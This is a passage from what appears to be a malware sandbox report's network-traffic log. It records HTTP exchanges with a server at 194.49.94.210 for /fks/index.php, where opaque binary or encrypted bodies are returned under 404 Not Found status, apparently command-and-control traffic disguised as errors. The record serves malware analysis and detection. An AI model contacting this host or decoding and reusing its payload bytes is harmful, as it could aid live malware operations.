bc 40 de dc fb 5d 56 33 40 a5 ca 75 83 e8 b9 5f 45 22 18 b1 e3 94 8d 8b 73 9a cc 76 61 e6 96 c7 c1 61 ed 41 c3 4a 2c ff 1f 72 97 af a6 7b b2 1c 70 f5 92 37 cf ad 86 78 68 90 77 1f b9 2d 53 69 c2 52 67 3a 85 75 20 6a f8 4c 46 f2 f8 3e 7e e4 a9 f3 b6 7c 90 41 c0 c6 74 40 e5 bf ef 87 b0 6d 65 84 46 23 a2 59 3e 35 26 1f 18 c2 2b fd 11 d7 20 0b bd 7b f6 3e 06 7b 72 f6 1d 02 7c 1b 4c b5 f7 ae 91 9d 60 d1 08 70 8a ca e8 b1 55 84 3a a6 93 49 89 4f 21 25 db db 1c 4c 13 b7 f6 51 cc 1b 32 f0 75 81 93 f1 da 36 ad 1b bf 78 51 79 fe 90 db e1 47 e4 fc 09 53 e2 99 df 87 b4 6b d6 86 da c0 40 c7 37 18 24 6c 52 c2 4e 14 86 39 4c f9 d3 19 1f 1a 0b 46 fd 99 74 70 3e 94 63 a1 69 c2 75 6e fd 29 2a 4b db 10 64 b9 90 fc d7 21 ce fd f8 62 7e 28 4f fa ad 59 ac 44 36 09 bc dc 08 48 f8 cc 76 de 0c 91 7d 02 a8 b7 6a 3b 0e 84 03 b9 02 5d 17 74 fb ce 9b d2 a6 de 2d 6e a4 c4 03 8d e4 24 bd 70 d8 3c 3f 43 f2 47 c8 cc 03 dd a1 33 9b 82 df 1a 17 59 db db 96 e2 46 a1 ff 82 20 86 aa d2 c7 86 e5 9c 77 30 96 2b a3 d7 e3 0b 2e d2 e4 32 1a 0c a4 89 8c 89 6c 30 cf eb c4 5e b5 1b 8a 42 2e b9 bc 44 79 c7 c0 b4 40 ca cc 01 45 d9 ad 10 31 3e b9 c0 76 b7 af 2e 8c 2b ca 12 d3 87 40 e0 25 d0 9e 54 de de 1a cc 5f 96 29 6d 93 55 7b 17 60 27 f2 2c 9e 4b 86 3d cb 5a 48 d2 79 1a 59 9b a1 aa 17 06 72 e1 3a 91 ac 16 79 7c 22 1b c8 59 2b 18 62 a1 35 e2 59 eb 6f e2 9c 5f 06 ca 5a 04 93 75 1e e4 0d 5c af 29 4b bf da 02 40 48 ac 86 cb 79 c1 f4 bc 5d 3f ff a3 ff 68 b7 d3 44 96 73 6d 51 c0 d7 c9 c2 91 5a 8c 1e 7e 2f 70 b8 00 a6 29 a0 de 42 a5 aa 2f f5 39 da 60 58 56 4f 12 a8 b9 ac 41 7c 61 95 f5 53 5e 3f 93 28 f7 af 74 d4 20 76 6c 74 45 ff 56 07 d5 e6 e4 86 7a fc 42 dd 06 89 d2 43 b2 dc 0c 54 1a a0 28 34 4c a2 e4 71 11 69 1f 10 35 fe ef f7 f5 79 61 cd f4 9a ac 0b c6 10 9b 42 1e 80 52 7e fd 56 c6 7c f1 d8 97 0a a8 af bb 4b b0 db f5 9d fd 77 7d 67 8a 21 89 6c d1 65 d4 32 67 9e 2e 24 4f 73 ab a3 86 48 5a ac 99 02 23 4a 67 ac f9 6a 37 4f b5 0d 9f 0e 91 08 7b b1 4d df d2 d0 95 ce 8d 3e 9c 16 c4 18 94 8c 42 63 aa be 6f a9 19 0e d2 e8
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 18 Nov 2023 09:02:25 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 414Keep-Alive: timeout=5, max=98Connection: Keep-AliveContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6b 73 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 39 34 2e 34 39 2e 39 34 2e 32 31 30 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fks/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 194.49.94.210 Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 18 Nov 2023 09:02:25 GMTServer: Apache/2.4.41 (Ubuntu)Keep-Alive: timeout=5, max=97Connection: Keep-AliveTransfer-Encoding: chunkedContent-Type: text/html; charset=utf-8Data Raw: 36 36 38 30 32 0d 0a 00 00 86 7d fd 5f f4 7c dd d5 07 e8 51 b7 af c5 63 e2 6c f0 3c d5 6e 87 ce 45 13 b6 e7 71 91 a2 5d f8 d7 5e 38 9f 7b c3 66 48 ad 39 e2 8d 18 d4 8e 85 0f de f7 5a f6 fc 42 98 13 94 4c 87 b1 33 ad 1b ff 98 08 31 b4 ab e8 cf d3 16 e5 c8 6c bc 16 9d ae 82 d7 3b 97 d4 3a 1a b1 e2 dd 79 13 1b a7 49 75 4d ba 1e 8a 7f 35 79 66 37 61 e0 24 f3 a5 af 1c 18 d0 b5 77 a3 37 d9 9c 37 b9 08 2d c8 72 f7 fb c6 b0 ff 66 b2 0a e1 0d dd 66 e2 b1 fb 9e 1a 14 f1 c9 e9 21 0c d3 1b a3 04 13 3c fb 18 d3 e4 49 c1 7a 4d 8a a4 75 b4 e3 41 51 21 6f 40 51 f8 43 2b 43 cb 12 84 0f da 06 f9 b5 40 33 1e 73 50 75 9d 0d 97 2d a0 f8 5c 13 54 09 11 89 d2 af 2b e4 82 32 97 24 41 7f fe b3 ae 2f 7d c7 74 f7 9c 3c 4b d5 4c 11 96 84 3c 18 51 72 0c 6b 96 35 f0 e8 1b 7f 1f d4 d0 63 1a f8 bc 40 de dc fb 5d 56 b7 db a1 ca 70 83 e8 b9 5f c5 27 18 61 4f 94 8d 8b 73 9a cc 76 61 e6 96 c7 c1 61 ed 41 c3 4a 2c ff 7f 77 97 af a6 7b b2 be 0c f3 92 0f cf ad 86 78 68 90 77 1f b9 2d 53 69 c2 52 67 3a 85 75 20 6a f8 4c 46 f2 f8 3e 7e e4 a9 f3 b6 7c 90 41 c0 c6 74 40 e5 bf ef 87 b0 6d 65 84 46 23 a2 59 3e 35 26 1f 18 c2 2b fd 11 d7 20 0b bd 7b f6 3e 06 7b 72 f6 1d 02 7c 1b 4c b5 f7 ae 91 9d 60 d1 08 40 1f ce e8 b1 55 84 3a a6 07 4d 89 4f 21 25 db db 1c 4c 13 b7 f6 51 cc 1b 32 f0 75 81 93 f1 da 36 ad 1b bf 78 51 79 fe 40 77 e1 47 e4 7c 0c 53 e2 35 df 87 b4 c7 d2 86 da c0 40 c7 37 18 24 6c 52 c2 4e 14 86 39 4c f9 d3 19 1f 1a 0b 46 fd 99 74 70 3e 94 63 c1 6c c2 75 6e fd 29 2a 5b de 10 64 b9 90 fc d7 21 ce fd f8 62 7e 28 4f fa ad 5b ac 44 36 09 bc dc 08 48 f8 cc 76 de 0c 91 7d 02 30 23 6e 3b 0e 84 03 b9 02 5d 17 74 fb ce 9b d2 5a 72 2d 6e 14 ec 06 8d e4 24 bf 70 01 3e 3f 43 92 18 c9 cc bb dd a1 33 9b 82 df 1a 17 59 db db 96 e2 46 a1 ff 82 20 86 aa d2 c7 86 e5 9c 77 30 96 2b a3 d7 e3 0b 2e d2 e4 32 1a 0c a4 89 8c 89 58 df d2 60 2e 97 0f 21 e8 6e 3f cf 52 3c 50 b6 17 ef 96 b1 43 e7 42 21 dc 55 3f fc a7 17 d2 40 ed 83 a1 42 37 98 da f9 ec ef 27 e8 bd 8f f6 34 40 01 9c 24 e9 9d a6 b4 0b 0c 35 19 11 d5 ba 96 d3 78 c6 46 45 ad 08 20 03 3d 7c 38 fb 34 3a 80 37 93 33 25 74 a2 2f 62 97 48 82 46 2f 86 c5 20 2e f4 0b 11 10 4f 9b 54 0a 4b b2 22 c0 97 9b e6 81 99 c0 43 8c 37 af ec d4 21 3c 8e ed dc 8f 98 9c 0c e3 48 1d ad 88 0a 0b fa bb 31 a9 d1 dd a9 83 b3 a3 e6 06 23 20 7f d2 53 a7 9f 92 e0 f4 76 0d b5 23 7c 90 7c 32 60 ee 64 7c d0 9e 07 6f 2d 84 b6 e3 ee 4a fe 55 11 ea 2c 21 dc 45 c5 05 ec 1a 92 26 0c 70 a2 f1 51 18 21 7b 48 54 97 e3 cf 52 cc 93 a0 7c b4 e0 0d 65 7f f9 f6 4c 48 6a 06 e7 99 ba 95 eb e0 6d 08 bf 1e b0 c4 1e a2 ec 52 91 91 7d 32 af 5e 1a 8c 3a ab 58 fd 55 26 a3 f6 e5 ca 65 74 a8 96 de c7 f9 58 42 37 a0 1c 78 59 dc 87 89 a6 40 4e 3c fe 3b e9 03 b7 9e b4 fd 9a 00 f5 c7 6d 6d 00 e1 b9 35 68 d2 c9 c5 f3 03 6a 3a 6b 4a e3 f1 63 07 08 fd 58 ea bc f4 0d 3c e8 b7 dc 71 2c
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 18 Nov 2023 09:02:26 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 414Keep-Alive: timeout=5, max=96Connection: Keep-AliveContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6b 73 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 39 34 2e 34 39 2e 39 34 2e 32 31 30 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fks/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 194.49.94.210 Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 18 Nov 2023 09:02:28 GMTServer: Apache/2.4.41 (Ubuntu)Keep-Alive: timeout=5, max=95Connection: Keep-AliveTransfer-Encoding: chunkedContent-Type: text/html; charset=utf-8Data Raw: 31 62 65 30 32 0d 0a 00 00 86 7d fd 5f f4 7c dd d5 07 e8 51 b7 af c5 63 e2 6c f0 3c d5 6e 87 ce 45 13 b6 e7 71 91 a2 5d f8 d7 5e 38 9f 7b c3 66 48 ad 39 e2 8d 18 d4 8e 85 0f de f7 5a f6 fc 42 98 13 94 4c 87 b1 33 ad 1b ff 98 08 31 b4 ab e8 cf d3 16 e5 c8 6c bc 16 9d ae 82 d7 3b 97 d4 3a 1a b1 e2 dd 79 13 1b a7 49 75 4d ba 1e 8a 7f 35 79 66 37 61 e0 24 f3 a5 af 1c 18 d0 b5 77 a3 37 d9 9c 37 b9 08 2d c8 72 f7 fb c6 b0 ff 66 b2 0a e1 79 c7 5f a5 b1 fb 9e 1a 14 f1 c9 e9 21 0c d3 1b a3 04 13 3c ff f7 d4 e4 d3 ce 7a 4d 8a a4 75 b4 f3 ec 56 21 6f 40 51 f8 43 4b 44 cb 12 84 0f da 06 f9 b5 40 33 1e 73 50 75 9d 0d 97 2d a0 f8 5c 11 54 09 11 89 d2 af 2b e4 62 36 97 24 41 7f fe b3 ae 2f 7d c7 74 f7 9c 3c 4b d5 4c 11 96 84 3c 18 51 72 0c 6b 96 35 f0 e8 1b 7f 1f d4 d0 63 1a f8 bc 40 de dc fb 5d 56 77 76 a6 ca 69 83 e8 b9 5f a5 20 18 eb 4d 94 8d 8b 73 9a cc 76 61 e6 96 c7 c1 61 ed 41 c3 4a 2c ff df 73 97 af a6 7b b2 1c 70 f5 92 37 cf ad 86 78 68 90 77 1f b9 2d 53 69 c2 52 67 3a 85 75 20 6a f8 4c 46 f2 f8 3e 7e e4 a9 f3 b6 7c 90 41 c0 c6 74 40 e5 bf ef 87 b0 6d 65 84 46 23 a2 59 3e 35 26 1f 18 c2 2b fd 11 d7 20 0b bd 7b f6 3e 06 7b 72 f6 1d 02 7c 1b 4c b5 f7 ae 91 9d 60 d1 08 b0 f3 c9 e8 b1 55 84 3a a6 eb 4a 89 4f 21 25 db db 1c 4c 13 b7 f6 51 cc 1b 32 f0 75 81 93 f1 da 36 ad 1b bf 78 51 79 fe ca 75 e1 47 e4 1c 0b 53 e2 3b df 87 b4 13 d5 86 da c0 40 c7 37 18 24 6c 52 c2 4e 14 86 39 4c f9 d3 19 1f 1a 0b 46 fd 99 74 70 3e 94 63 61 68 c2 75 6e fd 29 2a 81 d9 10 64 b9 90 fc d7 21 ce fd f8 62 7e 28 4f fa ad 59 ac 44 36 09 bc dc 08 48 f8 cc 76 de 0c 91 7d 02 68 8e 69 3b 0e 84 03 b9 02 5d 17 74 fb ce 9b d2 de 7b 2c 6e 58 4f 03 8d e6 24 bd 70 44 3e 3f 43 aa dc c9 cc 9e dc a1 33 9b 82 df 1a 17 59 db db 96 e2 46 a1 ff 82 20 86 aa d2 c7 86 e5 9c 77 30 96 2b a3 d7 e3 0b 2e d2 e4 32 1a 0c a4 89 8c 89 59 60 74 32 47 dd 7e 72 0d 86 64 f3 97 e4 f1 df d3 bb 02 85 5c 7a 07 d0 64 af 67 57 f9 f4 d1 d3 db b3 5b 17 8d ee b7 0f 7d 23 51 79 7d 8d ba 11 5f e4 4b d8 42 b7 6d 63 5a 39 71 99 df b7 19 19 8a c9 9c 0f e9 17 13 47 cc d7 72 a0 2d ca fa 61 7b bc 46 27 54 ee df 70 b8 0e 15 e5 c1 54 3c e6 96 7a 54 f6 b8 dc 07 c1 64 27 c8 c9 a1 c4 c2 3c 57 25 43 6e d9 41 8e 3f 8f c3 55 a7 7c 17 47 dc 95 cc 6a 22 34 20 f1 72 4c a1 85 5a 6d 6b ac 74 3c 56 ec 50 f4 af 8d 68 23 77 0b f9 a4 2a ce c2 f7 6f 69 64 84 63 03 e2 c2 33 4f b0 e8 53 10 68 20 d5 94 0e aa 92 fb 95 15 a5 81 c0 9e c5 2e 78 49 d2 4e 54 d9 ef 0c 48 ab f7 17 cf c2 e0 1b 78 13 b3 40 83 33 f2 e2 ef 42 73 76 a1 6c 09 c1 2c f5 66 92 92 fc 40 af 0b c6 ce cb 5e cd 83 e4 f7 ad ae fa c0 be f6 bf 3e 48 bf 32 47 cb 27 21 aa 0e 1b 79 5f 9f f0 6a 55 9b 40 b0 c7 15 55 9a f8 3b 7e 7d 6b 56 6c 82 2b 21 f6 61 a8 87 71 03 10 b3 b2 94 f0 46 9a b4 19 ba 8b 33 fb ea 6c e8 1f 61 a3 a0 dc b1 03 e8 a2 f3 62 76 be 5d 63 2c b9 d9 b6 fe d3
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 18 Nov 2023 09:02:29 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 414Keep-Alive: timeout=5, max=94Connection: Keep-AliveContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6b 73 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 39 34 2e 34 39 2e 39 34 2e 32 31 30 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fks/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 194.49.94.210 Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 18 Nov 2023 09:02:29 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 45Keep-Alive: timeout=5, max=93Connection: Keep-AliveContent-Type: text/html; charset=utf-8Data Raw: 00 00 87 48 0e 3e 83 15 b2 bb 39 c8 39 c3 24 4a 59 cd fb c1 05 e1 40 b3 f7 6b 6a 82 c9 40 a5 97 72 8c a5 3f 5e f9 12 a0 09 66 c8 41 87 Data Ascii: H>99$JY@kj@r?^fA
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 18 Nov 2023 09:02:32 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 414Keep-Alive: timeout=5, max=92Connection: Keep-AliveContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6b 73 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 39 34 2e 34 39 2e 39 34 2e 32 31 30 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fks/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 194.49.94.210 Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 18 Nov 2023 09:02:32 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 53Keep-Alive: timeout=5, max=91Connection: Keep-AliveContent-Type: text/html; charset=utf-8Data Raw: 00 00 87 48 0e 3e 83 15 b2 bb 39 c8 39 c3 24 4a 59 cd fb c1 05 e1 40 b3 f7 6b 6a 82 c9 40 a3 92 72 ac a5 2b 5d dc 09 ba 16 3c f2 72 8e c5 73 b7 c8 ab 6a a6 92 Data Ascii: H>99$JY@kj@r+]<rsj
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 18 Nov 2023 09:02:44 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 414Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6b 73 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 39 34 2e 34 39 2e 39 34 2e 32 31 30 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fks/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 194.49.94.210 Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 18 Nov 2023 09:02:44 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 47Keep-Alive: timeout=5, max=99Connection: Keep-AliveContent-Type: text/html; charset=utf-8Data Raw: 00 00 87 48 0e 3e 83 15 b2 bb 39 c8 39 c3 24 4a 59 cd fb c1 04 e0 40 b6 f7 73 7d 8f c9 40 a7 93 72 bb bf 34 51 ed 14 b0 15 22 df 17 87 f5 7d Data Ascii: H>99$JY@s}@r4Q"}
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 18 Nov 2023 09:02:48 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 414Keep-Alive: timeout=5, max=98Connection: Keep-AliveContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6b 73 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 39 34 2e 34 39 2e 39 34 2e 32 31 30 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fks/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered 